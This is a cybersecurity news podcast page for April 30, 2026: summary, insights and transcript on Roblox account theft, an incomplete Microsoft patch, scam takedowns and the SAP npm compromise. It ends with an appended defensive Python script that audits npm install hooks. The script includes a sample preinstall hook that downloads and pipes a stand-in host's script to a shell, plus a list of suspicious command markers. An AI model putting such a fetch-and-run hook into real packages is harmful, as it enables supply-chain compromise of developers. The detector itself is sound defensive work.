Cybersecurity Headlines

Roblox hackers arrested, Microsoft 0-day falls short, Dubai scam takedown

7 min
Apr 30, 2026
Summary

This episode covers major cybersecurity incidents including the arrest of Ukrainian hackers selling 610,000 compromised Roblox accounts, Microsoft's incomplete zero-day patch for Windows Shell, a joint U.S.-China operation dismantling Dubai-based cryptocurrency scam centers, and multiple supply chain and vulnerability discoveries affecting enterprise systems.

Insights
  • Incomplete security patches create persistent vulnerabilities: Microsoft's February fix for a zero-day left a credential theft vector exploitable by APT28, requiring a May 12 remediation deadline
  • AI-powered security tools are accelerating both vulnerability discovery and exploitation: 81% of teams report AI-generated code introduces new vulnerabilities while AI tools discover flaws in days vs. months
  • Supply chain attacks are evolving with sophisticated persistence: SAP NPM packages used malicious pre-install scripts to harvest developer credentials and self-propagate through poisoned dependencies
  • International law enforcement coordination is becoming critical: U.S.-China joint operations and Ukrainian arrests demonstrate coordinated efforts against cybercrime, though state-aligned concerns persist
  • Legacy protocol deprecation remains a significant operational challenge: Microsoft's TLS 1.0/1.1 blocking in Exchange Online will disrupt organizations still using older clients and devices
Trends
  • AI-accelerated vulnerability discovery creating pressure for rapid remediation cycles
  • Supply chain attacks targeting developer tools and credentials as high-value vectors
  • International law enforcement coordination against cybercrime and state-backed groups
  • Incomplete security patches leaving exploitable gaps despite vendor remediation efforts
  • Legacy protocol and authentication standard deprecation forcing enterprise modernization
  • Cryptocurrency-related fraud and scams as persistent billion-dollar threat to consumers
  • Info-stealing malware disguised as legitimate tools targeting gaming and consumer platforms
  • Lateral movement and credential theft as primary attack objectives post-initial compromise
  • Open-source and open-source-adjacent platforms as vulnerability discovery targets
  • AI-driven reverse engineering reducing time to vulnerability discovery from months to days
Companies
Microsoft
Issued incomplete zero-day patch for Windows Shell flaw exploited by APT28; blocking TLS 1.0/1.1 in Exchange Online
Roblox
610,000 user accounts hijacked and sold by Ukrainian hackers using info-stealing malware disguised as game tools
Meta
Provided data to U.S. and Chinese law enforcement for Dubai scam center investigation and arrests
GitHub
Disclosed high-severity RCE vulnerability in repository push access via unsanitized metadata injection
OpenEMR
Electronic health record platform with 38 previously unknown vulnerabilities including SQL injection and XSS flaws
Wiz
Security firm that discovered GitHub vulnerability using AI-powered reverse engineering tool in under 48 hours
Qinglong
Task scheduler software with authentication bypass flaws exploited for remote code execution and crypto mining
SAP
NPM packages related to SAP compromised in supply chain attack inserting credential-stealing malware
CISA
Added Microsoft Windows Shell zero-day to known exploited vulnerabilities list with May 12 remediation deadline
Aisle
Security firm that identified 38 vulnerabilities in OpenEMR platform using AI-driven scanning in three months
People
Sarah Lane
Presented cybersecurity headlines episode covering major incidents and vulnerabilities
Quotes
"While 96% of teams now use AI tools, 81% report that AI-generated code has introduced new vulnerabilities into their mobile apps."
Sarah Lane, mid-episode
"The bugs stem from mismatches in routing and authentication logic, allowing unauthorized access to admin endpoints"
Sarah Lane, Qinglong segment
"Exploitation began before disclosure, and while initial patches were incomplete, a later fix addressed the root cause"
Sarah Lane, Qinglong segment
Full Transcript
From the CISO Series, it's Cybersecurity Headlines. These are the cybersecurity headlines for Thursday, April 30th, 2026. I'm Sarah Lane.

Hackers arrested for selling Roblox accounts. Ukrainian authorities arrested three individuals for hijacking more than 610,000 Roblox accounts using info-stealing malware disguised as game enhancement tools. The attackers harvested credentials, sorted accounts by value, including at least 357 high-value profiles, and sold them through Russian platforms, generating around $225,000. Police seized devices and cash during raids, and the suspects now face up to 15 years in prison, as investigators look for additional victims and accomplices.

Microsoft's patch for a zero-day falls short. Microsoft and CISA warn that attackers are exploiting a zero-click Windows Shell flaw created by an incomplete fix for an earlier vulnerability used by Russian state-backed group APT28. The bug allows credential theft via forced authentication, exposing Net-NTLMv2 hashes that can be used to access sensitive data and move laterally on networks, even after Microsoft's February patches blocked the original remote code execution chain. CISA has added the flaw to its known exploited vulnerabilities list with a May 12 remediation deadline.

U.S. and China partner on Dubai scam takedown. A joint U.S. and Chinese law enforcement operation raided nine scam centers in Dubai, resulting in 276 arrests tied to cryptocurrency pig butchering schemes that defrauded American victims. Investigators traced the networks using data from Meta, financial records, and blockchain analysis, leading to charges against several organizers accused of running front companies coordinating the scams. This is part of a broader U.S. effort to combat cyber fraud, which cost Americans $16 billion last year. Concerns remain over links between Chinese criminal groups and state-aligned economic activity.

Hackers exploit RCE flaws in Qinglong. Attackers are exploiting two authentication bypass flaws in the Qinglong task scheduler to achieve remote code execution and deploy crypto miners on exposed servers. The bugs stem from mismatches in routing and authentication logic, allowing unauthorized access to admin endpoints and enabling attackers to inject malicious commands that install high-CPU mining processes disguised as legitimate system activity. Exploitation began before disclosure, and while initial patches were incomplete, a later fix addressed the root cause as infection spread across multiple environments.

Huge thanks to our sponsor, GuardSquare. AI is speeding up development, but at what cost? While 96% of teams now use AI tools, 81% report that AI-generated code has introduced new vulnerabilities into their mobile apps. In a world with automated threats, you need multi-layered, polymorphic security to stay ahead of the curve. Learn more at guardsquare.

Reverse engineering unearths GitHub bug. GitHub disclosed a high-severity flaw that could let attackers with repository push access achieve remote code execution by injecting malicious metadata through unsanitized input. The issue was discovered by Wiz using an AI-powered reverse engineering tool that analyzed closed-source binaries, reducing what would have taken months to under 48 hours. GitHub patched cloud instances with no evidence of exploitation, but many on-premise enterprise server deployments remained vulnerable.

Exchange Online blocks old TLS versions. Microsoft will start blocking TLS 1.0 and 1.1 connections to Exchange Online for POP3 and IMAP4 starting in July, fully ending support for the deprecated protocols. The move follows years of warnings, with most traffic already using TLS 1.2 or higher, though legacy clients and devices that opted into older endpoints could still face disruptions. The change reflects broader industry efforts to phase out insecure encryption standards, and unsurprisingly, Microsoft is pushing customers towards more modern protocols.

Flaws found in electronic health record platform. An AI-driven scan of the OpenEMR platform uncovered 38 previously unknown vulnerabilities, including SQL injection, authorization bypass, and XSS flaws that could enable database compromise, patient data theft, and remote code execution. Security firm Aisle identified the issues in three months and provided fixes, all of which have now been patched, with OpenEMR integrating the AI tool into its development workflow. AI is accelerating vulnerability discovery but also increasing pressure on defenders to rapidly triage and remediate risks.

SAP-related NPM packages compromised. Multiple SAP-related NPM packages were compromised in a supply chain attack that inserted credential-stealing malware via malicious pre-install scripts. The payload harvested developer credentials, cloud secrets, and tokens, exfiltrating them through victim-controlled GitHub repositories while also self-propagating by poisoning other packages and injecting malicious workflows. The attack exploited gaps in NPM's OIDC-trusted publishing and introduced new persistent techniques targeting AI coding tools, with maintainers now releasing clean versions to replace the infected packages.

Every organization wants to be able to recover from a ransomware attack. So why does no one seem to test properly for it? That is what we're trying to figure out on the latest episode of Defense In Depth. Look for the episode, How Do You Know If Your Backups Will Survive a Ransomware Attack? Wherever you get your podcasts. And if you have thoughts on the news from today or about our show in general, be sure to reach out. Feedback at CISOseries.com. We'd love to hear from you. I am Sarah Lane reporting for the CISO Series. You stay classy and safe out there.

Cybersecurity Headlines are available every weekday. Head to CISOseries.com for the full stories behind the headlines.
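Because the SAP-related npm compromise described in the transcript ran its payload from pre-install hooks, a defender's first question about a dependency tree is which packages declare install-time scripts at all. The audit below is an added example written for this page, not code from the episode, SAP or npm; the sample package.json is constructed, and the marker list is a heuristic assumption, not a malware signature.

```python
"""Audit npm package.json files for install-time lifecycle hooks.
Hypothetical defender-side check written for this page, not code from the
SAP packages or the episode; markers are heuristics, a hit means "review".
"""
import json
import os
from typing import Dict, List

INSTALL_HOOKS = ("preinstall", "install", "postinstall")
SUSPICIOUS_MARKERS = ("curl ", "wget ", "base64", "eval(", "node -e",
                      "child_process", "| sh", "| bash")

# Constructed sample manifest modelled on the install-hook pattern.
SAMPLE_PACKAGE_JSON = """{
  "name": "example-sdk",
  "version": "1.2.3",
  "scripts": {
    "preinstall": "node -e \\"require('child_process').execSync('curl -s https://example.invalid/setup | sh')\\"",
    "test": "jest"
  }
}"""

def flag_script(cmd: str) -> List[str]:
    """Return the suspicious markers present in one script command."""
    return [m for m in SUSPICIOUS_MARKERS if m in cmd]

def audit_package(pkg: Dict) -> List[Dict]:
    """Report every install-time hook declared in a parsed package.json."""
    scripts = pkg.get("scripts") or {}
    return [{"name": pkg.get("name", "<unnamed>"), "hook": hook,
             "command": cmd, "markers": flag_script(cmd)}
            for hook, cmd in scripts.items() if hook in INSTALL_HOOKS]

def audit_package_text(text: str) -> List[Dict]:
    """Same check on raw package.json text."""
    return audit_package(json.loads(text))

def audit_node_modules(path: str) -> List[Dict]:
    """Walk an installed tree and collect hooks from every package.json."""
    findings: List[Dict] = []
    for root, _dirs, files in os.walk(path):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(root, "package.json"), encoding="utf-8") as fh:
                findings.extend(audit_package(json.load(fh)))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, keep going
    return findings
```

Run `audit_node_modules("node_modules")` on an installed tree, or install with `npm ci --ignore-scripts` first and review the reported hooks before allowing them to execute.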